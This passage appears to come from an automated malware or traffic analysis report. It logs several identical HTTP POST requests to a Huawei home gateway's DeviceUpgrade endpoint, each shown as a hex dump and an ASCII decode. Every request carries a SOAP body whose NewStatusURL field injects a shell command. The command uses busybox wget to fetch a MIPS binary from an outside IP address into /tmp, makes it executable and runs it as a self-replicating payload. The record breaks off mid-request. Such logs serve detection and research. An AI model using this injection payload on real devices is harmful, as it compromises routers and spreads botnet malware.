6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope 